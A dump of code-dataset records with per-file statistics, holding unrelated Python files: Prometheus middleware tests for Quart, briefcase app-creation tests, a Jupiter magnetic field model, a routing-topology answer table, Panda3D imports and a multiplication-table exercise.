div = np.multiply(self.Y, np.log(np.divide(self.Y+eps, Yhat+eps))) - self.Y + Yhat
kldiv = np.sum(np.sum(div))
return kldiv
if self.L is not None:
#compute divergence when there is missing labels
Yhat = np.multiply(self.L,self.B @ self.S)
div = np.multiply(np.multiply(self.L, self.Y), np.log(np.divide(np.multiply(self.L, self.Y)+eps, Yhat+eps))) \
-np.multiply(self.L,self.Y) + Yhat
kldiv = np.sum(np.sum(div))
return kldiv
| 47.261824
| 141
| 0.542621
| 3,680
| 27,979
| 4.113043
| 0.06087
| 0.037328
| 0.071353
| 0.038055
| 0.889271
| 0.866477
| 0.832254
| 0.805893
| 0.773256
| 0.739892
| 0
| 0.009357
| 0.335394
| 27,979
| 591
| 142
| 47.341794
| 0.804625
| 0.297759
| 0
| 0.70979
| 0
| 0
| 0.081799
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020979
| false
| 0
| 0.006993
| 0
| 0.08042
| 0.034965
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17a0b7cd9a6d3d0cb3e7fc83398aaa40dc70e707
| 3,396
|
py
|
Python
|
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
tests/commands/create/test_create_app.py
|
paulproteus/briefcase
|
9d00dc9300cb00ef5dcd766e3a625a94b0462e51
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import mock
def test_create_app(tracking_create_command):
"If the app doesn't already exist, it will be created"
tracking_create_command.create_app(tracking_create_command.apps['first'])
# The right sequence of things will be done
assert tracking_create_command.actions == [
('generate', tracking_create_command.apps['first']),
('support', tracking_create_command.apps['first']),
('dependencies', tracking_create_command.apps['first']),
('code', tracking_create_command.apps['first']),
('resources', tracking_create_command.apps['first']),
]
# New app content has been created
assert (tracking_create_command.platform_path / 'first.bundle' / 'new').exists()
def test_create_existing_app_overwrite(tracking_create_command):
"An existing app can be overwritten if requested"
# Answer yes when asked
tracking_create_command.input = mock.MagicMock(return_value='y')
# Generate an app in the location.
bundle_path = tracking_create_command.platform_path / 'first.bundle'
bundle_path.mkdir(parents=True)
with (bundle_path / 'original').open('w') as f:
f.write('original template!')
tracking_create_command.create_app(tracking_create_command.apps['first'])
# The right sequence of things will be done
assert tracking_create_command.actions == [
('generate', tracking_create_command.apps['first']),
('support', tracking_create_command.apps['first']),
('dependencies', tracking_create_command.apps['first']),
('code', tracking_create_command.apps['first']),
('resources', tracking_create_command.apps['first']),
]
# Original content has been deleted
assert not (bundle_path / 'original').exists()
# New app content has been created
assert (bundle_path / 'new').exists()
def test_create_existing_app_no_overwrite(tracking_create_command):
"If you say no, the existing app won't be overwritten"
# Answer no when asked
tracking_create_command.input = mock.MagicMock(return_value='n')
bundle_path = tracking_create_command.platform_path / 'first.bundle'
bundle_path.mkdir(parents=True)
with (bundle_path / 'original').open('w') as f:
f.write('original template!')
tracking_create_command.create_app(tracking_create_command.apps['first'])
# No app creation actions will be performed
assert tracking_create_command.actions == []
# Original content still exists
assert (bundle_path / 'original').exists()
# New app content has not been created
assert not (bundle_path / 'new').exists()
def test_create_existing_app_no_overwrite_default(tracking_create_command):
"By default, the existing app won't be overwritten"
# Answer '' (i.e., just press return) when asked
tracking_create_command.input = mock.MagicMock(return_value='')
bundle_path = tracking_create_command.platform_path / 'first.bundle'
bundle_path.mkdir(parents=True)
with (bundle_path / 'original').open('w') as f:
f.write('original template!')
tracking_create_command.create_app(tracking_create_command.apps['first'])
assert tracking_create_command.actions == []
# Original content still exists
assert (bundle_path / 'original').exists()
# New app content has not been created
assert not (bundle_path / 'new').exists()
| 37.318681
| 84
| 0.715842
| 431
| 3,396
| 5.387471
| 0.199536
| 0.198966
| 0.29845
| 0.150732
| 0.854866
| 0.841947
| 0.841947
| 0.787252
| 0.738157
| 0.738157
| 0
| 0
| 0.173439
| 3,396
| 90
| 85
| 37.733333
| 0.827218
| 0.202297
| 0
| 0.666667
| 0
| 0
| 0.178337
| 0
| 0
| 0
| 0
| 0
| 0.215686
| 1
| 0.078431
| false
| 0
| 0.019608
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd6665d843367358b18f01273f4a236fd07e4e0d
| 46
|
py
|
Python
|
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | null | null | null |
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | 5
|
2018-12-27T02:52:01.000Z
|
2019-01-02T01:52:55.000Z
|
e2e/server_unreachable/some_test.py
|
testandconquer/pytest-conquer
|
da600c7f5bcd06aa62c5cca9b75370bf1a6ebf05
|
[
"MIT"
] | null | null | null |
import time
def test_a():
time.sleep(1)
| 7.666667
| 17
| 0.630435
| 8
| 46
| 3.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.23913
| 46
| 5
| 18
| 9.2
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd97486db17525bb3c04503418deaca33bc13446
| 9,887
|
py
|
Python
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 104
|
2016-11-01T04:43:23.000Z
|
2022-03-09T18:15:05.000Z
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 35
|
2017-04-05T07:52:15.000Z
|
2022-03-13T02:29:50.000Z
|
tests/test_quart.py
|
JacobHenner/aioprometheus
|
d0528e832a1cdbc3503942b1b0c8925a43007500
|
[
"MIT"
] | 18
|
2017-02-08T07:48:26.000Z
|
2022-03-01T01:16:29.000Z
|
import logging
import sys
import unittest
import asynctest
from aioprometheus import REGISTRY, Counter, MetricsMiddleware, formats, render
try:
from quart import Quart, request
from aioprometheus.asgi.quart import metrics
have_quart = True
except ImportError:
have_quart = False
@unittest.skipUnless(have_quart, "Quart library is not available")
class TestQuartRender(asynctest.TestCase):
"""Test exposing Prometheus metrics from within a Quart app"""
def tearDown(self):
REGISTRY.clear()
async def test_render_in_quart_app(self):
"""check render usage in Quart app"""
app = Quart(__name__)
app.events_counter = Counter("events", "Number of events.")
@app.route("/")
async def index():
app.events_counter.inc({"path": "/"})
return "hello"
@app.route("/metrics")
async def handle_metrics():
content, http_headers = render(REGISTRY, request.headers.getlist("accept"))
return content, http_headers
# The test client also starts the web service
test_client = app.test_client()
# Access root to increment metric counter
response = await test_client.get("/")
self.assertEqual(response.status_code, 200)
# Get default format
response = await test_client.get("/metrics", headers={"accept": "*/*"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
# payload = await response.get_data()
# Get text format
response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
# Get binary format
response = await test_client.get(
"/metrics",
headers={"accept": formats.binary.BINARY_CONTENT_TYPE},
)
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.binary.BINARY_CONTENT_TYPE,
response.headers.get("content-type"),
)
async def test_asgi_middleware(self):
"""check ASGI middleware usage in Quart app"""
app = Quart(__name__)
app.events_counter = Counter("events", "Number of events.")
@app.route("/")
async def index():
app.events_counter.inc({"path": "/"})
return "hello"
# Add a route that always generates an exception
@app.route("/boom")
async def hello():
raise Exception("Boom")
app.asgi_app = MetricsMiddleware(app.asgi_app)
app.add_url_rule("/metrics", "metrics", metrics, methods=["GET"])
# The test client also starts the web service
test_client = app.test_client()
# Access root to increment metric counter
response = await test_client.get("/")
self.assertEqual(response.status_code, 200)
# Get default format
response = await test_client.get("/metrics", headers={"accept": "*/*"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check content
self.assertIn('events{path="/"} 1', content)
self.assertIn('requests_total_counter{method="GET",path="/"} 1', content)
self.assertIn(
'status_codes_counter{method="GET",path="/",status_code="200"} 1', content
)
self.assertIn('responses_total_counter{method="GET",path="/"} 1', content)
# Access it again to confirm default metrics get incremented
response = await test_client.get("/")
self.assertEqual(response.status_code, 200)
# Get text format
response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check content
self.assertIn('events{path="/"} 2', content)
self.assertIn('requests_total_counter{method="GET",path="/"} 2', content)
self.assertIn(
'status_codes_counter{method="GET",path="/",status_code="200"} 2', content
)
self.assertIn('responses_total_counter{method="GET",path="/"} 2', content)
# Confirm no exception have been observed so far.
self.assertNotIn("exceptions_total_counter{", content)
# Access boom route to trigger exception metric update.
# Silence the stderr output log generated by Quart when it captures
# the exception.
with self.assertLogs("quart.app", logging.ERROR):
with asynctest.mock.patch.object(sys.stderr, "write") as mock_stderr:
response = await test_client.get("/boom")
self.assertEqual(response.status_code, 500)
response = await test_client.get("/metrics", headers={"accept": "*/*"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check exception counter was NOT incremented due to Quart not
# propagating exceptions out to the ASGI layer.
self.assertNotIn(
'exceptions_total_counter{method="GET",path="/boom"} 1', content
)
self.assertIn(
'status_codes_counter{method="GET",path="/boom",status_code="500"} 1',
content,
)
async def test_asgi_middleware_group_status_codes_enabled(self):
"""check ASGI middleware group status codes usage in FastAPI app"""
app = Quart(__name__)
app.events_counter = Counter("events", "Number of events.")
@app.route("/")
async def index():
app.events_counter.inc({"path": "/"})
return "hello"
# Add a route that always generates an exception
@app.route("/boom")
async def hello():
raise Exception("Boom")
app.asgi_app = MetricsMiddleware(app.asgi_app, group_status_codes=True)
app.add_url_rule("/metrics", "metrics", metrics, methods=["GET"])
# The test client also starts the web service
test_client = app.test_client()
# Access root to increment metric counter
response = await test_client.get("/")
self.assertEqual(response.status_code, 200)
# Get default format
response = await test_client.get("/metrics", headers={"accept": "*/*"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check content
self.assertIn('events{path="/"} 1', content)
self.assertIn('requests_total_counter{method="GET",path="/"} 1', content)
self.assertIn(
'status_codes_counter{method="GET",path="/",status_code="2xx"} 1', content
)
self.assertIn('responses_total_counter{method="GET",path="/"} 1', content)
# Access it again to confirm default metrics get incremented
response = await test_client.get("/")
self.assertEqual(response.status_code, 200)
# Get text format
response = await test_client.get("/metrics", headers={"accept": "text/plain;"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check content
self.assertIn('events{path="/"} 2', content)
self.assertIn('requests_total_counter{method="GET",path="/"} 2', content)
self.assertIn(
'status_codes_counter{method="GET",path="/",status_code="2xx"} 2', content
)
self.assertIn('responses_total_counter{method="GET",path="/"} 2', content)
# Confirm no exception have been observed so far.
self.assertNotIn("exceptions_total_counter{", content)
# Access boom route to trigger exception metric update.
# Silence the stderr output log generated by Quart when it captures
# the exception.
with self.assertLogs("quart.app", logging.ERROR):
with asynctest.mock.patch.object(sys.stderr, "write") as mock_stderr:
response = await test_client.get("/boom")
self.assertEqual(response.status_code, 500)
response = await test_client.get("/metrics", headers={"accept": "*/*"})
self.assertEqual(response.status_code, 200)
self.assertIn(
formats.text.TEXT_CONTENT_TYPE,
response.headers.get("content-type"),
)
payload = await response.get_data()
content = payload.decode("utf-8")
# Check exception counter was NOT incremented due to Quart not
# propagating exceptions out to the ASGI layer.
self.assertNotIn(
'exceptions_total_counter{method="GET",path="/boom"} 1', content
)
self.assertIn(
'status_codes_counter{method="GET",path="/boom",status_code="5xx"} 1',
content,
)
| 36.618519
| 87
| 0.616668
| 1,108
| 9,887
| 5.362816
| 0.134477
| 0.054527
| 0.057556
| 0.061932
| 0.888253
| 0.864692
| 0.864692
| 0.85796
| 0.85796
| 0.839953
| 0
| 0.011797
| 0.262668
| 9,887
| 269
| 88
| 36.754647
| 0.803292
| 0.133104
| 0
| 0.711111
| 0
| 0
| 0.184801
| 0.10618
| 0
| 0
| 0
| 0
| 0.272222
| 1
| 0.005556
| false
| 0
| 0.044444
| 0
| 0.077778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da08638632f2975d301b02c5cca682f314d45e1d
| 3,441
|
py
|
Python
|
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
cn/bvt/assignment-3/topo5.py
|
adamacosta/bvt
|
17f8e94105b346ddad185900df08269702e94391
|
[
"MIT"
] | null | null | null |
# a Star topology centered on Z
# D G J
# \ | /
# \ | /
# E H K
# \ | /
# \ | /
# F I L
# \ | /
# \ | /
# A --- B --- C --------- Z -------- M --- N --- O
# / | \
# / | \
# P S V
# / | \
# / | \
# Q T W
# / | \
# / | \
# R U X
#
topo = { 'A' : ['B'],
'B' : ['A', 'C'],
'C' : ['B', 'Z'],
'D' : ['E'],
'E' : ['D', 'F'],
'F' : ['E', 'Z'],
'G' : ['H'],
'H' : ['G', 'I'],
'I' : ['H', 'Z'],
'J' : ['K'],
'K' : ['J', 'L'],
'L' : ['K', 'Z'],
'M' : ['Z', 'N'],
'N' : ['M', 'O'],
'O' : ['N'],
'P' : ['Z', 'Q'],
'Q' : ['P', 'R'],
'R' : ['Q'],
'S' : ['Z', 'T'],
'T' : ['S', 'U'],
'U' : ['T'],
'V' : ['Z', 'W'],
'W' : ['V', 'X'],
'X' : ['W'],
'Z' : ['C', 'F', 'I', 'L', 'M', 'P', 'S', 'V']}
ans = \
'A:A0,B1,C2,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'B:A1,B0,C1,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'C:A2,B1,C0,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'D:A6,B5,C4,D0,E1,F2,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'E:A5,B4,C3,D1,E0,F1,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'F:A4,B3,C2,D2,E1,F0,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'G:A6,B5,C4,D6,E5,F4,G0,H1,I2,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'H:A5,B4,C3,D5,E4,F3,G1,H0,I1,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'I:A4,B3,C2,D4,E3,F2,G2,H1,I0,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'J:A6,B5,C4,D6,E5,F4,G6,H5,I4,J0,K1,L2,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'K:A5,B4,C3,D5,E4,F3,G5,H4,I3,J1,K0,L1,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'L:A4,B3,C2,D4,E3,F2,G4,H3,I2,J2,K1,L0,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'M:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M0,N1,O2,P2,Q3,R4,S2,T3,U4,V2,W3,X4,Z1' + \
'N:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M1,N0,O1,P3,Q4,R5,S3,T4,U5,V3,W4,X5,Z2' + \
'O:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M2,N1,O0,P4,Q5,R6,S4,T5,U6,V4,W5,X6,Z3' + \
'P:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P0,Q1,R2,S2,T3,U4,V2,W3,X4,Z1' + \
'Q:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P1,Q0,R1,S3,T4,U5,V3,W4,X5,Z2' + \
'R:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P2,Q1,R0,S4,T5,U6,V4,W5,X6,Z3' + \
'S:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S0,T1,U2,V2,W3,X4,Z1' + \
'T:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S1,T0,U1,V3,W4,X5,Z2' + \
'U:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S2,T1,U0,V4,W5,X6,Z3' + \
'V:A4,B3,C2,D4,E3,F2,G4,H3,I2,J4,K3,L2,M2,N3,O4,P2,Q3,R4,S2,T3,U4,V0,W1,X2,Z1' + \
'W:A5,B4,C3,D5,E4,F3,G5,H4,I3,J5,K4,L3,M3,N4,O5,P3,Q4,R5,S3,T4,U5,V1,W0,X1,Z2' + \
'X:A6,B5,C4,D6,E5,F4,G6,H5,I4,J6,K5,L4,M4,N5,O6,P4,Q5,R6,S4,T5,U6,V2,W1,X0,Z3' + \
'Z:A3,B2,C1,D3,E2,F1,G3,H2,I1,J3,K2,L1,M1,N2,O3,P1,Q2,R3,S1,T2,U3,V1,W2,X3,Z0'
| 47.136986
| 82
| 0.408021
| 756
| 3,441
| 1.857143
| 0.236772
| 0.019943
| 0.029915
| 0.039886
| 0.717949
| 0.717949
| 0.692308
| 0.662393
| 0.662393
| 0.623932
| 0
| 0.251408
| 0.277536
| 3,441
| 73
| 83
| 47.136986
| 0.313355
| 0.190061
| 0
| 0
| 0
| 0.490196
| 0.713304
| 0.686913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
da310f299c75d14dc54551cf69badd8a06c426a9
| 2,642
|
py
|
Python
|
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | 1
|
2021-09-07T11:44:20.000Z
|
2021-09-07T11:44:20.000Z
|
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | null | null | null |
vip4model/ModelCart.py
|
mattkjames7/vip4model
|
63f1fd0a566f2adcf93cdd424f5155fc62336ec3
|
[
"MIT"
] | null | null | null |
import numpy as np
from .Model import Model,ModelScalar
from ._SphHarm import _SphHarm,_SphHarmScalarCart
def ModelCart(x,y,z,MaxDeg=4):
'''
VIP4 Magnetic field model (see Connerney et al 1998 below). The
model uses right-handed System III coordinates (I think).
Inputs
======
x : float
x-coordinate in Rj, R-H System III.
y : float
y-coordinate in Rj, R-H System III.
z : float
z-coordinate in Rj, R-H System III.
Returns
=======
Bx : float
x component of magnetic field, nT.
By : float
y component of magnetic field, nT.
Bz : float
z component of magnetic field, nT.
Please cite:
Connerney, J. E. P., Acuña, M. H., Ness, N. F., and Satoh, T. (1998),
New models of Jupiter's magnetic field constrained by the Io flux
tube footprint, J. Geophys. Res., 103( A6), 11929– 11939,
doi:10.1029/97JA03726.
'''
#convert to spherical polar coords
r = np.sqrt(x**2 + y**2 + z**2)
theta = np.arccos(z/r)
phi = (np.arctan2(y,x) + (2*np.pi)) % (2*np.pi)
#call the model
Br,Bt,Bp = Model(r,theta,phi,MaxDeg)
#convert to Cartesian (hopefully correctly...)
cost = np.cos(theta)
sint = np.sin(theta)
cosp = np.cos(phi)
sinp = np.sin(phi)
Bx = Br*sint*cosp + Bt*cost*cosp - Bp*sinp
By = Br*sint*sinp + Bt*cost*sinp + Bp*cosp
Bz = Br*cost - Bt*sint
return Bx,By,Bz
def ModelCartScalar(x,y,z,MaxDeg=4):
'''
VIP4 Magnetic field model. The
model uses right-handed System III coordinates (I think).
Inputs
======
x : float
x-coordinate in Rj, R-H System III.
y : float
y-coordinate in Rj, R-H System III.
z : float
z-coordinate in Rj, R-H System III.
Returns
=======
Bx : float
x component of magnetic field, nT.
By : float
y component of magnetic field, nT.
Bz : float
z component of magnetic field, nT.
If using the VIP4 model, please cite the following paper:
Connerney, J. E. P., Acuña, M. H., Ness, N. F., and Satoh, T. (1998),
New models of Jupiter's magnetic field constrained by the Io flux
tube footprint, J. Geophys. Res., 103( A6), 11929– 11939,
doi:10.1029/97JA03726.12
'''
#convert to spherical polar coords
r = np.sqrt(x**2 + y**2 + z**2)
theta = np.arccos(z/r)
phi = (np.arctan2(y,x) + (2*np.pi)) % (2*np.pi)
#call the model
Br,Bt,Bp = ModelScalar(r,theta,phi,MaxDeg)
#convert to Cartesian (hopefully correctly...)
cost = np.cos(theta)
sint = np.sin(theta)
cosp = np.cos(phi)
sinp = np.sin(phi)
Bx = Br*sint*cosp + Bt*cost*cosp - Bp*sinp
By = Br*sint*sinp + Bt*cost*sinp + Bp*cosp
Bz = Br*cost - Bt*sint
return Bx,By,Bz
def ModelTest(x,y,z,MaxDeg=4):
return _SphHarmScalarCart(x,y,z,MaxDeg)
| 23.175439
| 71
| 0.652536
| 458
| 2,642
| 3.759825
| 0.248908
| 0.075494
| 0.04878
| 0.052265
| 0.852497
| 0.84669
| 0.84669
| 0.84669
| 0.84669
| 0.809524
| 0
| 0.041011
| 0.206283
| 2,642
| 113
| 72
| 23.380531
| 0.779208
| 0.632097
| 0
| 0.709677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.096774
| 0.032258
| 0.290323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da37afa1ca208c5cbbe4afdc3395e64ac8c1d7c9
| 1,044
|
py
|
Python
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dev/tools/leveleditor/pandac/PandaModules.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
try:
from libpandaexpressModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libpandaModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libpandaphysicsModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libdirectModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libpandafxModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libpandaodeModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libotpModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
try:
from libtoontownModules import *
except ImportError, err:
if 'DLL loader cannot find' not in str(err):
raise
| 21.75
| 48
| 0.671456
| 136
| 1,044
| 5.154412
| 0.169118
| 0.079886
| 0.262482
| 0.296719
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0.788873
| 0
| 0
| 0.259579
| 1,044
| 47
| 49
| 22.212766
| 0.906856
| 0
| 0
| 0.8
| 0
| 0
| 0.168582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.4
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
16f3b9243726b77a85a24462c0c49b0a4eb40ead
| 796
|
py
|
Python
|
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
lesson01/luofeng/99_table.py
|
herrywen-nanj/51reboot
|
1130c79a360e1b548a6eaad176eb60f8bed22f40
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding:utf8 -*-
#*******************************************
# Author: LuoFeng
# Date: 2019-05-18
# Filename: 99_table.py
# Describe:
#*******************************************
# 正方形九九乘法表
for n in range(1,10):
# python3 print() 函数支持 end 参数,python2 不支持, 默认值 end = '\n'
for m in range(1,10):
print('{} * {} = {}'.format(n, m, n*m), end='\t')
print('')
# 左上三角形九九乘法表
for n in range(1,10):
# python3 print() 函数支持 end 参数,python2 不支持, 默认值 end = '\n'
for m in range(n,10):
print('{} * {} = {}'.format(n, m, n*m), end='\t')
print('')
# 左下三角形九九乘法表
for n in range(1,10):
# python3 print() 函数支持 end 参数,python2 不支持, 默认值 end = '\n'
for m in range(1,n+1):
print('{} * {} = {}'.format(n, m, n*m), end='\t')
print('')
| 26.533333
| 61
| 0.472362
| 114
| 796
| 3.289474
| 0.324561
| 0.112
| 0.106667
| 0.106667
| 0.712
| 0.712
| 0.712
| 0.712
| 0.712
| 0.648
| 0
| 0.052885
| 0.21608
| 796
| 29
| 62
| 27.448276
| 0.548077
| 0.492462
| 0
| 0.75
| 0
| 0
| 0.107692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
e508f5357db4a49c22092c74450b60b28e97ffeb
| 3,726
|
py
|
Python
|
src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 63
|
2018-05-17T21:02:14.000Z
|
2021-11-15T19:18:03.000Z
|
